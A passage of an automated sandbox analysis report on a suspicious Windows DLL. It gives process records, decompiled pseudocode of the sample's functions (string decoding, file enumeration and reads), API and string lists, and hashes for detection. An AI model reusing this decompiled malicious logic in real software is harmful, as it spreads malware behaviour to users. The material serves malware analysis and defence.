Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6528 Parent PID: 6068

General

Start time:	14:27:23
Start date:	22/11/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6068 CREDAT:17410 /prefetch:2
Imagebase:	0x1000000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 3112 Parent PID: 6196

General

Start time:	14:27:26
Start date:	22/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\2W6FcgEeMy.dll,adqehmqaggtoqofda
Imagebase:	0x1160000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2944 Parent PID: 6196

General

Start time:	14:27:32
Start date:	22/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\2W6FcgEeMy.dll,awkikcxxkllcr
Imagebase:	0x1160000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6196 Parent PID: 5740 loaddll32.exeCOMMON

Executed Functions

Function 6EDA23D0, Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 289
fileCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E6EDA23D0() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				struct _WIN32_FIND_DATAA _v596;
				long _v600;
				long _v604;
				void _v605;
				void _v606;
				intOrPtr _v624;
				void* _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				char _v656;
				char _v660;
				intOrPtr _v664;
				intOrPtr* _v668;
				intOrPtr _v672;
				intOrPtr _v676;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t77;
				struct _SECURITY_ATTRIBUTES** _t82;
				char _t83;
				void* _t86;
				void* _t89;
				struct _SECURITY_ATTRIBUTES** _t91;
				char _t92;
				void* _t98;
				void* _t100;
				void* _t114;
				void* _t127;
				void* _t128;
				long _t129;
				void* _t130;
				void* _t131;
				void* _t134;
				void* _t135;
				signed int _t136;
				char* _t137;
				void* _t140;
				void* _t142;
				intOrPtr* _t143;
				char* _t146;
				char* _t147;
				void* _t148;
				void* _t149;
				char* _t150;
				char* _t151;
				void* _t153;
				void* _t155;
				void* _t156;
				void* _t157;
				signed int _t158;
				signed int _t160;
				int _t177;

				_t160 = (_t158 & 0xfffffff8) - 0x2a4;
				_t77 =  *0x6edc3004; // 0x8da52076
				_v8 = _t77 ^ _t160;
				_v664 =  *0x6edc56bc;
				_v660 = 0;
				_v656 = 0x62b173f7;
				_v652 = 0x7afa27fd;
				_v648 = 0x66b13ae3;
				_v644 = 0x70ea3aed;
				_v640 = 0x3aac7af9;
				_v636 = 0x159e4994;
				_v624 =  *0x6edc5ac4;
				if(_v660 == 0) {
					_t136 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t160 + 0x24 + _t136 * 4) =  *(_t160 + 0x24 + _t136 * 4) ^ 0x159e4994;
						_t136 = _t136 + 1;
					} while (_t136 < 6);
				}
				_t82 =  &_v276;
				_t130 = 0x104;
				do {
					 *_t82 = 0;
					_t82 =  &(_t82[0]);
					_t130 = _t130 - 1;
				} while (_t130 != 0);
				_t83 = _v276;
				_t146 =  &_v276;
				if(_t83 == 0) {
					L8:
					_t137 =  &_v656;
					if(_v656 != 0) {
						_t157 = _t146 - _t137;
						while(_t130 <= 0x104) {
							_t130 = _t130 + 1;
							 *((char*)(_t157 + _t137)) =  *_t137;
							_t137 =  &(_t137[1]);
							if( *_t137 != 0) {
								continue;
							}
							break;
						}
						_t83 = _v276;
					}
				} else {
					while(_t130 <= 0x104) {
						_t146 = _t146 + 1;
						_t130 = _t130 + 1;
						if( *_t146 != 0) {
							continue;
						} else {
							goto L8;
						}
						goto L13;
					}
				}
				L13:
				_t131 = 0;
				_t147 =  &_v276;
				if(_t83 == 0) {
					L16:
					_t137 = "*";
					_t148 = _t147 - _t137;
					while(_t131 <= 0x104) {
						_t131 = _t131 + 1;
						 *((char*)(_t148 + _t137)) =  *_t137;
						_t137 =  &(_t137[1]);
						if( *_t137 != 0) {
							continue;
						}
						goto L19;
					}
				} else {
					while(_t131 <= 0x104) {
						_t147 = _t147 + 1;
						_t131 = _t131 + 1;
						if( *_t147 != 0) {
							continue;
						} else {
							goto L16;
						}
						goto L19;
					}
				}
				L19:
				_t86 = FindFirstFileA( &_v276,  &_v596); // executed
				_t127 = _t86;
				asm("xorps xmm0, xmm0");
				_v628 = _t127;
				asm("movsd [esp+0x50], xmm0"); // executed
				_t177 = FindNextFileA(_t127,  &_v596);
				if(_t177 != 0) {
					while(1) {
						asm("movsd xmm0, [0x6edc1000]");
						asm("comisd xmm0, [esp+0x48]");
						if(_t177 <= 0) {
							goto L55;
						}
						_t91 =  &_v276;
						_t134 = 0x104;
						do {
							 *_t91 = 0;
							_t91 =  &(_t91[0]);
							_t134 = _t134 - 1;
						} while (_t134 != 0);
						_t92 = _v276;
						_t150 =  &_v276;
						if(_t92 == 0) {
							L27:
							_t137 =  &_v656;
							if(_v656 != 0) {
								_t156 = _t150 - _t137;
								while(_t134 <= 0x104) {
									_t134 = _t134 + 1;
									 *((char*)(_t156 + _t137)) =  *_t137;
									_t137 =  &(_t137[1]);
									if( *_t137 != 0) {
										continue;
									}
									break;
								}
								_t92 = _v276;
							}
						} else {
							while(_t134 <= 0x104) {
								_t150 = _t150 + 1;
								_t134 = _t134 + 1;
								if( *_t150 != 0) {
									continue;
								} else {
									goto L27;
								}
								goto L32;
							}
						}
						L32:
						_t135 = 0;
						_t151 =  &_v276;
						if(_t92 == 0) {
							L35:
							_t137 =  &(_v596.cFileName);
							if(_v596.cFileName != 0) {
								_t155 = _t151 - _t137;
								while(_t135 <= 0x104) {
									_t135 = _t135 + 1;
									 *((char*)(_t155 + _t137)) =  *_t137;
									_t137 =  &(_t137[1]);
									if( *_t137 != 0) {
										continue;
									}
									goto L39;
								}
							}
						} else {
							while(_t135 <= 0x104) {
								_t151 = _t151 + 1;
								_t135 = _t135 + 1;
								if( *_t151 != 0) {
									continue;
								} else {
									goto L35;
								}
								goto L39;
							}
						}
						L39:
						if((_v596.dwFileAttributes & 0x00000010) == 0 && _v596.nFileSizeLow < 0x7530) {
							_t129 = 0;
							_v676 =  *0x6edc5ecc;
							_v672 =  *0x6edc60d0;
							_v632 =  *0x6edc5cc8;
							_v668 =  *0x6edc62d4;
							_t98 = CreateFileA( &_v276, 0x80000000, 1, 0, 3, 0x80, 0); // executed
							_t142 = _t98;
							if(_t142 != 0xffffffff) {
								while(1) {
									_t100 = CreateFileA( &_v276, 0x80000000, 1, 0, 3, 0x80, 0); // executed
									_t153 = _t100;
									if(_t153 == 0xffffffff) {
										goto L53;
									}
									if(SetFilePointer(_t142, _t129, 0, 0) != 0xffffffff || GetLastError() == 0) {
										if(SetFilePointer(_t153, _t129, 0, 0) != 0xffffffff || GetLastError() == 0) {
											_v604 = 0;
											_v600 = 0;
											ReadFile(_t142,  &_v606, 1,  &_v604, 0);
											ReadFile(_t153,  &_v605, 1,  &_v600, 0);
											if(_v604 == 0 || _v600 == 0) {
												goto L52;
											} else {
												CloseHandle(_t142); // executed
												 *_v668(_t153);
												_t129 = _t129 + 1; // executed
												_t114 = CreateFileA( &_v280, 0x80000000, 1, 0, 3, 0x80, 0); // executed
												_t142 = _t114;
												if(_t142 != 0xffffffff) {
													continue;
												} else {
												}
											}
										} else {
											goto L52;
										}
									} else {
										L52:
										_t143 = _v668;
										 *_t143(_t142);
										 *_t143(_t153);
									}
									goto L53;
								}
							}
							L53:
							asm("movsd xmm0, [esp+0x48]");
							asm("addsd xmm0, [0x6edc0ff8]");
							_t127 = _v628;
							asm("movsd [esp+0x48], xmm0");
						}
						if(FindNextFileA(_t127,  &_v596) != 0) {
							continue;
						}
						goto L55;
					}
				}
				L55:
				_t89 = _v624();
				_t140 = _t127;
				_pop(_t149);
				_pop(_t128);
				return E6EDA3753(_t89, _t128, _v12 ^ _t160, _t137, _t140, _t149);
			}

0x6eda23d6
0x6eda23dc
0x6eda23e3
0x6eda23f1
0x6eda2401
0x6eda2406
0x6eda240e
0x6eda2416
0x6eda241e
0x6eda2426
0x6eda242e
0x6eda2436
0x6eda2443
0x6eda2445
0x6eda2447
0x6eda2450
0x6eda2459
0x6eda245d
0x6eda245e
0x6eda2450
0x6eda2463
0x6eda246a
0x6eda2470
0x6eda2470
0x6eda2476
0x6eda2479
0x6eda2479
0x6eda247e
0x6eda2485
0x6eda248e
0x6eda249f
0x6eda24a4
0x6eda24a8
0x6eda24ac
0x6eda24b0
0x6eda24ba
0x6eda24bb
0x6eda24be
0x6eda24c2
0x00000000
0x00000000
0x00000000
0x6eda24c2
0x6eda24c4
0x6eda24c4
0x00000000
0x6eda2490
0x6eda2498
0x6eda2499
0x6eda249d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6eda249d
0x6eda2490
0x6eda24cb
0x6eda24cb
0x6eda24cd
0x6eda24d6
0x6eda24e7
0x6eda24e7
0x6eda24ec
0x6eda24f0
0x6eda24fa
0x6eda24fb
0x6eda24fe
0x6eda2502
0x00000000
0x00000000
0x00000000
0x6eda2502
0x00000000
0x6eda24d8
0x6eda24e0
0x6eda24e1
0x6eda24e5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6eda24e5
0x6eda24d8
0x6eda2504
0x6eda2511
0x6eda2513
0x6eda2515
0x6eda251c
0x6eda2522
0x6eda252c
0x6eda252e
0x6eda2540
0x6eda2540
0x6eda2548
0x6eda254e
0x00000000
0x00000000
0x6eda2554
0x6eda255b
0x6eda2560
0x6eda2560
0x6eda2566
0x6eda2569
0x6eda2569
0x6eda256e
0x6eda2575
0x6eda257e
0x6eda258f
0x6eda2594
0x6eda2598
0x6eda259c
0x6eda25a0
0x6eda25aa
0x6eda25ab
0x6eda25ae
0x6eda25b2
0x00000000
0x00000000
0x00000000
0x6eda25b2
0x6eda25b4
0x6eda25b4
0x00000000
0x6eda2580
0x6eda2588
0x6eda2589
0x6eda258d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6eda258d
0x6eda2580
0x6eda25bb
0x6eda25bb
0x6eda25bd
0x6eda25c6
0x6eda25d7
0x6eda25df
0x6eda25e6
0x6eda25ea
0x6eda25f0
0x6eda25fa
0x6eda25fb
0x6eda25fe
0x6eda2602
0x00000000
0x00000000
0x00000000
0x6eda2602
0x6eda25f0
0x00000000
0x6eda25c8
0x6eda25d0
0x6eda25d1
0x6eda25d5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6eda25d5
0x6eda25c8
0x6eda2604
0x6eda2609
0x6eda2625
0x6eda263c
0x6eda2647
0x6eda2658
0x6eda265c
0x6eda2660
0x6eda2662
0x6eda2667
0x6eda2670
0x6eda268a
0x6eda268c
0x6eda2691
0x00000000
0x00000000
0x6eda26a4
0x6eda26c1
0x6eda26d3
0x6eda26e2
0x6eda26ec
0x6eda26ff
0x6eda2708
0x00000000
0x6eda2711
0x6eda2716
0x6eda2719
0x6eda2739
0x6eda273a
0x6eda273c
0x6eda2741
0x00000000
0x00000000
0x6eda2747
0x6eda2741
0x00000000
0x00000000
0x00000000
0x6eda2749
0x6eda2749
0x6eda274a
0x6eda274e
0x6eda2751
0x6eda2751
0x00000000
0x6eda26a4
0x6eda2670
0x6eda2753
0x6eda2753
0x6eda2759
0x6eda2761
0x6eda2765
0x6eda2765
0x6eda2777
0x00000000
0x00000000
0x00000000
0x6eda2777
0x6eda2540
0x6eda277d
0x6eda277e
0x6eda2789
0x6eda278a
0x6eda278b
0x6eda2796

APIs

FindFirstFileA.KERNELBASE(?,?), ref: 6EDA2511
FindNextFileA.KERNELBASE(00000000,?), ref: 6EDA2528
CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 6EDA2660
CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 6EDA268A
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000), ref: 6EDA269D
GetLastError.KERNEL32 ref: 6EDA26A6
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000), ref: 6EDA26BA
GetLastError.KERNEL32 ref: 6EDA26C3
ReadFile.KERNELBASE(00000000,?,00000001,?,00000000), ref: 6EDA26EC
ReadFile.KERNELBASE(00000000,?,00000001,00000010,00000000), ref: 6EDA26FF
CloseHandle.KERNELBASE(00000000), ref: 6EDA2716
CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 6EDA273A
FindNextFileA.KERNELBASE(00000000,00000010), ref: 6EDA2771

Strings

0u, xrefs: 6EDA260F
KERNEL32.dll, xrefs: 6EDA23F0
:p, xrefs: 6EDA241E

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CreateFind$ErrorLastNextPointerRead$CloseFirstHandle
String ID: 0u$KERNEL32.dll$:p
API String ID: 2068188990-1299952309
Opcode ID: 91764e3fb31b7943ff48fcd2f1afc61aac447d703f62185fa96c19a9afb258b7
Instruction ID: 6b39a90c5ffd552a26e893cbcd15593e781e99cbe68499da9e41a9a2d2b95bd5
Opcode Fuzzy Hash: 91764e3fb31b7943ff48fcd2f1afc61aac447d703f62185fa96c19a9afb258b7
Instruction Fuzzy Hash: 81B1E37050C380DFE761CF6AC8947AABBE8BF8A758F00095DE6D597180D7B0D645CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA27A0, Relevance: 4.0, Strings: 3, Instructions: 218COMMON

Download Yara Rule

Strings

KERNEL32.dll, xrefs: 6EDA27BE
ymezsvhmixxcrhkgzdsvgjhpolmlrxdj, xrefs: 6EDA290C
DllRegisterServer, xrefs: 6EDA2A27

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: DllRegisterServer$KERNEL32.dll$ymezsvhmixxcrhkgzdsvgjhpolmlrxdj
API String ID: 0-2567593731
Opcode ID: 91deed4203a807d2a927e70d73e4cb4581390e733dc6298f55d6fff9a02a8b18
Instruction ID: 284707b1d504b8ee637f9e365b94293393006fa44102256ce6d9d05489683623
Opcode Fuzzy Hash: 91deed4203a807d2a927e70d73e4cb4581390e733dc6298f55d6fff9a02a8b18
Instruction Fuzzy Hash: C091E071E082948FD701CFFDC5503ADBBF1AF5A718F184299E595EB282D7349A82CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA38BB, Relevance: 10.6, APIs: 7, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E6EDA38BB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t34;
				signed int _t40;
				signed int _t41;
				signed int _t45;
				signed char _t54;
				signed int _t56;
				signed int _t58;
				void* _t61;
				void* _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t82;

				_t68 = __edx;
				_push(0x10);
				_push(0x6edc13f8);
				E6EDA4120(__ebx, __edi, __esi);
				_t34 =  *0x6edc3870; // 0x1
				if(_t34 > 0) {
					 *0x6edc3870 = _t34 - 1;
					 *(_t82 - 0x1c) = 1;
					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
					 *((char*)(_t82 - 0x20)) = E6EDA3D03();
					 *(_t82 - 4) = 1;
					__eflags =  *0x6edc3bb0 - 2;
					if( *0x6edc3bb0 != 2) {
						E6EDA3F9D(_t68, 1, __esi, 7);
						asm("int3");
						_push(0xc);
						_push(0x6edc1420);
						E6EDA4120(__ebx, 1, __esi);
						_t72 =  *(_t82 + 0xc);
						__eflags = _t72;
						if(_t72 != 0) {
							L9:
							 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
							__eflags = _t72 - 1;
							if(_t72 == 1) {
								L12:
								_t58 =  *(_t82 + 0x10);
								_t76 = E6EDA3A76( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
								 *(_t82 - 0x1c) = _t76;
								__eflags = _t76;
								if(_t76 != 0) {
									_t41 = E6EDA3761(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58); // executed
									_t76 = _t41;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t76;
									if(_t76 != 0) {
										goto L14;
									}
								}
							} else {
								__eflags = _t72 - 2;
								if(_t72 == 2) {
									goto L12;
								} else {
									_t58 =  *(_t82 + 0x10);
									L14:
									_push(_t58);
									_t76 = E6EDA2A70( *((intOrPtr*)(_t82 + 8)), _t72);
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t72 - 1;
									if(_t72 == 1) {
										__eflags = _t76;
										if(_t76 == 0) {
											_push(_t58);
											_t45 = E6EDA2A70( *((intOrPtr*)(_t82 + 8)), _t42);
											__eflags = _t58;
											_t25 = _t58 != 0;
											__eflags = _t25;
											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
											E6EDA38BB(_t58, _t68, _t72, _t76, _t25);
											_pop(_t61);
											E6EDA3A76( *((intOrPtr*)(_t82 + 8)), _t76, _t58);
										}
									}
									__eflags = _t72;
									if(_t72 == 0) {
										L19:
										_t76 = E6EDA3761(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
										 *(_t82 - 0x1c) = _t76;
										__eflags = _t76;
										if(_t76 != 0) {
											_t76 = E6EDA3A76( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
											 *(_t82 - 0x1c) = _t76;
										}
									} else {
										__eflags = _t72 - 3;
										if(_t72 == 3) {
											goto L19;
										}
									}
								}
							}
							 *(_t82 - 4) = 0xfffffffe;
							_t40 = _t76;
						} else {
							__eflags =  *0x6edc3870 - _t72; // 0x1
							if(__eflags > 0) {
								goto L9;
							} else {
								_t40 = 0;
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
						return _t40;
					} else {
						E6EDA3DCE(__ebx, _t61, 1, __esi);
						E6EDA3C8A();
						E6EDA40EC();
						 *0x6edc3bb0 =  *0x6edc3bb0 & 0x00000000;
						 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
						E6EDA3950();
						_t54 = E6EDA3F6F( *((intOrPtr*)(_t82 + 8)), 0);
						asm("sbb esi, esi");
						_t80 =  ~(_t54 & 0x000000ff) & 1;
						__eflags = _t80;
						 *(_t82 - 0x1c) = _t80;
						 *(_t82 - 4) = 0xfffffffe;
						E6EDA395D();
						_t56 = _t80;
						goto L4;
					}
				} else {
					_t56 = 0;
					L4:
					 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
					return _t56;
				}
			}

0x6eda38bb
0x6eda38bb
0x6eda38bd
0x6eda38c2
0x6eda38c7
0x6eda38ce
0x6eda38d5
0x6eda38dd
0x6eda38e0
0x6eda38e9
0x6eda38ec
0x6eda38ef
0x6eda38f6
0x6eda3965
0x6eda396a
0x6eda396b
0x6eda396d
0x6eda3972
0x6eda3977
0x6eda397a
0x6eda397c
0x6eda398d
0x6eda398d
0x6eda3991
0x6eda3994
0x6eda39a0
0x6eda39a0
0x6eda39ad
0x6eda39af
0x6eda39b2
0x6eda39b4
0x6eda39bf
0x6eda39c4
0x6eda39c6
0x6eda39c9
0x6eda39cb
0x00000000
0x00000000
0x6eda39cb
0x6eda3996
0x6eda3996
0x6eda3999
0x00000000
0x6eda399b
0x6eda399b
0x6eda39d1
0x6eda39d1
0x6eda39db
0x6eda39dd
0x6eda39e0
0x6eda39e3
0x6eda39e5
0x6eda39e7
0x6eda39e9
0x6eda39ee
0x6eda39f3
0x6eda39f5
0x6eda39f5
0x6eda39fb
0x6eda39fc
0x6eda3a01
0x6eda3a07
0x6eda3a07
0x6eda39e7
0x6eda3a0c
0x6eda3a0e
0x6eda3a15
0x6eda3a1f
0x6eda3a21
0x6eda3a24
0x6eda3a26
0x6eda3a32
0x6eda3a5a
0x6eda3a5a
0x6eda3a10
0x6eda3a10
0x6eda3a13
0x00000000
0x00000000
0x6eda3a13
0x6eda3a0e
0x6eda3999
0x6eda3a5d
0x6eda3a64
0x6eda397e
0x6eda397e
0x6eda3984
0x00000000
0x6eda3986
0x6eda3986
0x6eda3986
0x6eda3984
0x6eda3a69
0x6eda3a75
0x6eda38f8
0x6eda38f8
0x6eda38fd
0x6eda3902
0x6eda3907
0x6eda390e
0x6eda3912
0x6eda391c
0x6eda3928
0x6eda392a
0x6eda392a
0x6eda392c
0x6eda392f
0x6eda3936
0x6eda393b
0x00000000
0x6eda393b
0x6eda38d0
0x6eda38d0
0x6eda393d
0x6eda3940
0x6eda394c
0x6eda394c

APIs

__RTC_Initialize.LIBCMT ref: 6EDA3902
___scrt_uninitialize_crt.LIBCMT ref: 6EDA391C

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: 5d8d18bf1deabefab82f6d56be8e1a7bea548378366d5a119ef064c5a67a6d10
Instruction ID: 1b7ee4757967066011092c276b0bb0fd39eb2274b4b8b3f7a55d6bd2824e3abf
Opcode Fuzzy Hash: 5d8d18bf1deabefab82f6d56be8e1a7bea548378366d5a119ef064c5a67a6d10
Instruction Fuzzy Hash: 4441A472D04765EFDB619FEDC848B9E7ABAEB41B98F014519EA1467250C730CB028BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA396B, Relevance: 7.6, APIs: 5, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E6EDA396B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t24;
				signed int _t25;
				signed int _t29;
				signed int _t35;
				void* _t37;
				void* _t40;
				signed int _t42;
				signed int _t45;
				void* _t47;
				void* _t52;

				_t40 = __edx;
				_push(0xc);
				_push(0x6edc1420);
				E6EDA4120(__ebx, __edi, __esi);
				_t42 =  *(_t47 + 0xc);
				if(_t42 != 0) {
					L3:
					 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
					__eflags = _t42 - 1;
					if(_t42 == 1) {
						L6:
						_t35 =  *(_t47 + 0x10);
						_t45 = E6EDA3A76( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							L16:
							 *(_t47 - 4) = 0xfffffffe;
							_t24 = _t45;
							L17:
							 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0x10));
							return _t24;
						}
						_t25 = E6EDA3761(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35); // executed
						_t45 = _t25;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							goto L16;
						}
						L8:
						_push(_t35);
						_t45 = E6EDA2A70( *((intOrPtr*)(_t47 + 8)), _t42);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t42 - 1;
						if(_t42 == 1) {
							__eflags = _t45;
							if(_t45 == 0) {
								_push(_t35);
								_t29 = E6EDA2A70( *((intOrPtr*)(_t47 + 8)), _t26);
								__eflags = _t35;
								_t14 = _t35 != 0;
								__eflags = _t14;
								_push((_t29 & 0xffffff00 | _t14) & 0x000000ff);
								E6EDA38BB(_t35, _t40, _t42, _t45, _t14);
								_pop(_t37);
								E6EDA3A76( *((intOrPtr*)(_t47 + 8)), _t45, _t35);
							}
						}
						__eflags = _t42;
						if(_t42 == 0) {
							L13:
							_t45 = E6EDA3761(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35);
							 *(_t47 - 0x1c) = _t45;
							__eflags = _t45;
							if(_t45 != 0) {
								_t45 = E6EDA3A76( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
								 *(_t47 - 0x1c) = _t45;
							}
							goto L16;
						} else {
							__eflags = _t42 - 3;
							if(_t42 != 3) {
								goto L16;
							}
							goto L13;
						}
					}
					__eflags = _t42 - 2;
					if(_t42 == 2) {
						goto L6;
					}
					_t35 =  *(_t47 + 0x10);
					goto L8;
				}
				_t52 =  *0x6edc3870 - _t42; // 0x1
				if(_t52 > 0) {
					goto L3;
				}
				_t24 = 0;
				goto L17;
			}

0x6eda396b
0x6eda396b
0x6eda396d
0x6eda3972
0x6eda3977
0x6eda397c
0x6eda398d
0x6eda398d
0x6eda3991
0x6eda3994
0x6eda39a0
0x6eda39a0
0x6eda39ad
0x6eda39af
0x6eda39b2
0x6eda39b4
0x6eda3a5d
0x6eda3a5d
0x6eda3a64
0x6eda3a66
0x6eda3a69
0x6eda3a75
0x6eda3a75
0x6eda39bf
0x6eda39c4
0x6eda39c6
0x6eda39c9
0x6eda39cb
0x00000000
0x00000000
0x6eda39d1
0x6eda39d1
0x6eda39db
0x6eda39dd
0x6eda39e0
0x6eda39e3
0x6eda39e5
0x6eda39e7
0x6eda39e9
0x6eda39ee
0x6eda39f3
0x6eda39f5
0x6eda39f5
0x6eda39fb
0x6eda39fc
0x6eda3a01
0x6eda3a07
0x6eda3a07
0x6eda39e7
0x6eda3a0c
0x6eda3a0e
0x6eda3a15
0x6eda3a1f
0x6eda3a21
0x6eda3a24
0x6eda3a26
0x6eda3a32
0x6eda3a5a
0x6eda3a5a
0x00000000
0x6eda3a10
0x6eda3a10
0x6eda3a13
0x00000000
0x00000000
0x00000000
0x6eda3a13
0x6eda3a0e
0x6eda3996
0x6eda3999
0x00000000
0x00000000
0x6eda399b
0x00000000
0x6eda399b
0x6eda397e
0x6eda3984
0x00000000
0x00000000
0x6eda3986
0x00000000

APIs

dllmain_raw.LIBCMT ref: 6EDA39A8
dllmain_crt_dispatch.LIBCMT ref: 6EDA39BF
dllmain_raw.LIBCMT ref: 6EDA3A07
dllmain_crt_dispatch.LIBCMT ref: 6EDA3A1A
dllmain_raw.LIBCMT ref: 6EDA3A2D

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 6b89ca80a7d88060c31f4fb9bfb97d467b38fa589a98b06e8609c63a3b6b32f1
Instruction ID: 6e94ad8b7065570bfcc0e1c116c1de7eb5669cbb18886fa8f534c3eb45477c61
Opcode Fuzzy Hash: 6b89ca80a7d88060c31f4fb9bfb97d467b38fa589a98b06e8609c63a3b6b32f1
Instruction Fuzzy Hash: 1A214172D04625EFDB618FDDC848AAF7A7ADB81B94B014515FA145B250D730CF528BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA5AEE, Relevance: 4.6, APIs: 3, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6EDA5AEE(void* __ebx, intOrPtr* _a4) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr* _v40;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				void* _t24;
				void* _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t33;
				intOrPtr* _t36;
				intOrPtr* _t41;
				intOrPtr _t50;
				intOrPtr _t51;
				void* _t53;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr* _t59;
				void* _t62;
				intOrPtr _t63;
				intOrPtr* _t64;
				void* _t68;

				_push(_t35);
				_t33 = _a4;
				_t50 = 0;
				_t59 = _t33;
